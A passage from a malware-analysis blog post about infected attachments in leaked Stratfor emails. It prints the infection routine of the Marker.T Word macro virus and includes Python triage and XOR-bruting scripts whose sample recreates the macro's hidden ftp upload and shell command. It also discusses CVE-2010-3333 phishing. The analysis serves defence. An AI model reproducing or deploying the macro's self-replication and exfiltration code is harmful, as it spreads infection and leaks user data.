            OurCode = OurCode & Chr(13) & _
                "' " & Format(Time, "hh:mm:ss AMPM - ") & _
                Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
                "' " & Application.UserName & Chr(13) & _
                "' " & UserAddress & Chr(13)
            nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
            nt.CodeModule.AddFromString OurCode
            If SaveNormalTemplate = True Then NormalTemplate.Save
        End If
        'Infect the ActiveDocument
        If NormalTemplateInfected = True And _
           (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
            ActiveDocument.Saved = False) Then
            SaveDocument = ActiveDocument.Saved
            OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
            ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
            ad.CodeModule.AddFromString OurCode
            If SaveDocument = True Then ActiveDocument.Save
        End If
    End If
End Sub
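As an added example (my own code, not anything from the post or from the GI Files), here is a small static triage pass over VBA source of the kind a tool such as olevba extracts, keyed to the behaviours the macro above shows: the marker string, switching VirusProtection off, rewriting the Normal template's code module, dropping an ftp -s script and launching it through a hidden shell. The indicator names, the weights and the sample excerpt are my own constructions, and the host in the excerpt is a documentation address, not the one in the macro.

```python
import re

# Behaviours of the Marker.T macro, as regexes with assumed weights (my own scoring).
INDICATORS = {
    "marker-string":        (r'"<- this is a marker!"',                    5),
    "virus-protection-off": (r"Options\.VirusProtection\s*=\s*False",        3),
    "code-module-rewrite":  (r"CodeModule\.(AddFromString|DeleteLines)\b",   3),
    "normal-template-save": (r"NormalTemplate\.Save\b",                      2),
    "ftp-script-drop":      (r"ftp\.exe\s+-n\s+-s:",                         3),
    "hidden-shell":         (r"\bShell\b.*\bvbHide\b",                       2),
    "close-autorun":        (r"\bSub\s+(Document_Close|AutoClose)\b",        1),
}
_COMPILED = {k: (re.compile(p, re.I), w) for k, (p, w) in INDICATORS.items()}

def triage_vba(source: str) -> dict:
    """Return {'hits': [indicator names], 'score': int} for extracted VBA source."""
    hits = [name for name, (rx, _) in _COMPILED.items() if rx.search(source)]
    return {"hits": hits, "score": sum(_COMPILED[h][1] for h in hits)}

# The macro writes an ftp command script; 'o <host>' is the line that names the server.
_FTP_OPEN = re.compile(r'Print\s+#\d+,\s*"o\s+([^"\s]+)"', re.I)

def ftp_targets(source: str) -> list:
    """Pull every host the macro's ftp -s script would connect to."""
    return _FTP_OPEN.findall(source)

# Constructed excerpt in the shape of the macro above (host is a documentation address).
SAMPLE_MACRO = r'''
Private Sub Document_Close()
    On Error Resume Next
    Const Marker = "<- this is a marker!"
    Options.VirusProtection = False
    Open "c:\netldx.vxd" For Output As #1
    Print #1, "o 192.0.2.10"
    Print #1, "user anonymous"
    Close #1
    Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
    nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
    nt.CodeModule.AddFromString OurCode
    If SaveNormalTemplate = True Then NormalTemplate.Save
End Sub
'''
BENIGN_MACRO = "Sub FormatTable()\n    Selection.Tables(1).AutoFormat\nEnd Sub\n"

if __name__ == "__main__":
    print(triage_vba(SAMPLE_MACRO), ftp_targets(SAMPLE_MACRO))
    print(triage_vba(BENIGN_MACRO))
```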
We shouldn't be convinced that this is the entire payload. The IP address included here has been recorded as a part of Marker.T since 2002. Just to be on the safe side, I tried it - there are no FTP connections being accepted at 220.127.116.11, which looks like it is assigned to a Vietnamese restaurant in New Jersey.
Using OfficeMalScanner provides further information:
[*] SCAN mode selected
[*] Opening file 117870_Hybrid write-up2.doc
[*] Filesize is 604672 (0x93a00) Bytes
[*] Ms Office OLE2 Compound Format document detected
[*] Scanning now...

+++++ decryption loop detected at offset: 0x00019eb8 +++++
33C9          xor ecx, ecx
E7EE          out EEh, eax
2974E835      sub [eax+ebp*8+35h], esi
79F7          jns $-07h
34A2          xor al, A2h
12F5          adc dh, ch
72F7          jb $-07h
94            xchg esp, eax
BA0EE6EEA9    mov edx, A9EEE60Eh
7909          jns $+0Bh
E615          out 15h, al
774F          jnbe $+51h
51            push ecx
B42F          mov ah, 2Fh
EE            out dx, al
9E            sahf

--------------------------------------------------------------------------
Brute-forcing for encrypted PE- and embedded OLE-files now...
Bruting XOR Key: 0x01

Analysis finished!
------------------------------------------------------------------------
117870_Hybrid write-up2.doc seems to be malicious! Malicious Index = 10
------------------------------------------------------------------------
There appears to be an additional, encrypted payload in these files, in addition to the Visual Basic macro that sits on top. Uncovering it will take me a bit more time.
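As an added example (my own code, not OfficeMalScanner's), here is the idea behind its "Bruting XOR Key" step: try every single-byte key over the document bytes and look for the magics an embedded payload would carry, a PE file ("MZ" stub whose e_lfanew field points at "PE\0\0") or an OLE2 compound document. The sample buffer is constructed (a bare DOS stub XORed with 0x01 behind some filler), not bytes from the GI Files.

```python
import struct

OLE2_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")   # compound document header
DOS_HEADER_LEN = 0x40                             # sizeof(IMAGE_DOS_HEADER)

def find_pe_headers(buf: bytes):
    """Yield offsets of 'MZ' stubs whose e_lfanew really points at 'PE\\0\\0'."""
    pos = 0
    while True:
        i = buf.find(b"MZ", pos)
        if i < 0 or i + DOS_HEADER_LEN > len(buf):
            return
        e_lfanew = struct.unpack_from("<I", buf, i + 0x3C)[0]
        pe = i + e_lfanew
        if e_lfanew < 0x10000 and buf[pe:pe + 4] == b"PE\0\0":
            yield i
        pos = i + 1

def brute_xor(buf: bytes) -> list:
    """Try all 256 single-byte keys; return (key, kind, offset) for every magic found."""
    hits = []
    for key in range(256):
        table = bytes(b ^ key for b in range(256))   # translate() beats a per-byte loop
        dec = buf.translate(table)
        hits.extend((key, "PE", off) for off in find_pe_headers(dec))
        off = dec.find(OLE2_MAGIC)
        if off >= 0:
            hits.append((key, "OLE2", off))
    return hits

# Constructed sample: DOS stub + PE signature, XORed with 0x01, after 32 filler bytes,
# so the expected answer is key 0x01 with the PE header at offset 32.
_stub = bytearray(DOS_HEADER_LEN + 16)
_stub[0:2] = b"MZ"
struct.pack_into("<I", _stub, 0x3C, DOS_HEADER_LEN)   # e_lfanew -> right after DOS header
_stub[DOS_HEADER_LEN:DOS_HEADER_LEN + 4] = b"PE\0\0"
SAMPLE = b"\x00" * 32 + bytes(b ^ 0x01 for b in _stub)

if __name__ == "__main__":
    for key, kind, off in brute_xor(SAMPLE):
        print(f"key=0x{key:02x} {kind} header at offset 0x{off:x}")
```

Key 0x00 on a real document reports the OLE2 container itself at offset 0; the interesting hits are the non-zero keys.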
In addition to these three files I have also been working on a fourth file that makes use of a different set of exploits, 6566_TheSplitBetw.doc. Don't be fooled by the .DOC extension; this is an RTF file. 6566_TheSplitBetw.doc uses a classic RTF exploit, CVE-2010-3333.
This exploit has been used in a number of attacks. In June 2011 a University of Louisville email server began sending out an email with an attachment claiming to be an "Insider's Guide to Military Benefits". The body of the email appeared to target Naval officers:
From: CDR Courtney Bricks [mailto:email@example.com]
Sent: Tuesday, May 31, 2011 11:23 PM
Subject: Defense News article of interest
Defense News article by Chris Cavas, from your interview last week is pasted below. Article appeared as a straight Q and A story, everything reads balanced and fair. Please let me know if you have any questions or concerns.
The U.S. Navy's major shipbuilding and aviation programs are largely setting into stability, but questions are rising about the strategic outlook for the Navy and Marine Corps and the forces they will need in the future, all in the context of a declining defense budget.
Navy Under Secretary Robert Work is in the center of the effort to define the Navy Department's direction and map out its future roles.
Then again in May of 2011 the same exploit was used as an attachment to an email titled "Courier who led U.S. to Osama bin Laden's hideout identified" which was sent to a significant number of US government email addresses.
Both times the payload was different. The exploit is a Metasploit module. It's been patched by Microsoft since 2010.
I am still in the process of investigating this; however, I am particularly interested in the creation of an executable, C:\a.exe, as well as a secondary RTF file, Tripolitania.RTF. Tripolitania, incidentally, was the name for the Libyan city of Tripoli in the early 20th century, when it was an Italian colony. These Stratfor guys do seem to have an interest in history (NOTE: Tripolitania.RTF appears to be the name of the first version of this document). I've recovered a little bit of the actual text of the attachment, and it looks like it was culled from a web page from Students for a Free Tibet:
"Lobby your government leaders to speak up for Tibet and protest Chinese leaders when they travel abroad. Take part in international days of action and commemorate historic dates within the Tibet movement."
At this point very few conclusions can be drawn from this information besides the obvious: those downloading this content from Wikileaks must use significant security measures to ensure the safety and reliability of their computing systems. Media organizations, including Wikileaks, are publishing email attachments like the ones I have identified here as infected with malware as part of their coverage of these document leaks. It is possible, for example, to search and download emails and attachments from the Wikileaks site. It does not take a wild imagination to figure that those initially reviewing these documents could take significant security precautions, while such precautions become less vital through the editing process until very few precautions are taken by the end user, who expects this content to be sanitized before it is provided to them by a media organization.
When downloading and viewing these files, most are attempting to protect themselves from surveillance, things like NSA's XKEYSCORE. Few users are expecting the leaked files themselves to be a threat. While there is overlap between the sort of security precautions that would protect a computer against outside surveillance and those that protect against infected files, there are significant differences. For example, air gapping can be an effective deterrent against surveillance and against some of the worst features of malware. However, the threat from surveillance is often considered transitory. After performing the task which needs to be protected from prying eyes, a user might not find it unreasonable to break their air gap and reconnect to the internet after deleting their secret files. Alternatively, a user might rely on a USB stick to transfer applications or files from the air-gapped computer to a network-available computer. All such activity is easily exploited by malicious software. To use a somewhat related analogy: Tor won't protect you from a keylogger.
This is why notification of malicious software in these files is important: so users can adjust their operational security plans to account for it.
There are a number of theories that could account for the presence of this malicious software. Perhaps the least wild-eyed of those theories is that Stratfor employees were receiving these malicious files through email. Whether or not those employees did anything with those malicious files, they could have been retrieved by Lulzsec, who in turn provided them to Wikileaks. The data is indeed massive, over 5.5 million emails. Perhaps so massive that roughly two years was not long enough to properly review and sanitize these files prior to their complete publication in 2014 (from the time they were received by WL sometime around 2012).
That is not the only explanation. The Snowden revelations have spelled out in plain detail how the same organizations that have been very invested in the destruction of Wikileaks could very well be capable of putting malicious software into a remote server, or to redirect a file transfer so that malicious software was transferred.
This post should not be construed as a warning to avoid paying close attention to media coverage of intelligence controversies because of the threat of malicious software. Quite the opposite, really. The information contained in these "Global Intelligence Files" is of critical social importance. People around the world should be able to inform themselves without putting themselves at undue risk.
The good news is this: the malware I have so far identified is old. So old that those using the latest versions of the software noted as vulnerable earlier are very likely safe even when executing these files. I scanned a number of these files using Virus Total, and a significant number of anti-virus applications were able to detect an issue with the files. The flipside of this positive spin is that at best only half of the popular antivirus applications I used to test these files (I tested using roughly 70 antivirus programs) detected malicious software. Some files were only detected by 15 antivirus programs.
One last note: I will almost certainly be updating this post and writing additional information about what I find as I continue my research. This is very much a "work in progress". I welcome all additional information, particularly information that conflicts with or adds to what I have found so far.
NOTE: my second post on this on this topic is online, and contains further malware analysis.
Hector Monsegur, formerly sabu of Lulzsec, contacted me. Our discussion is available on my third post.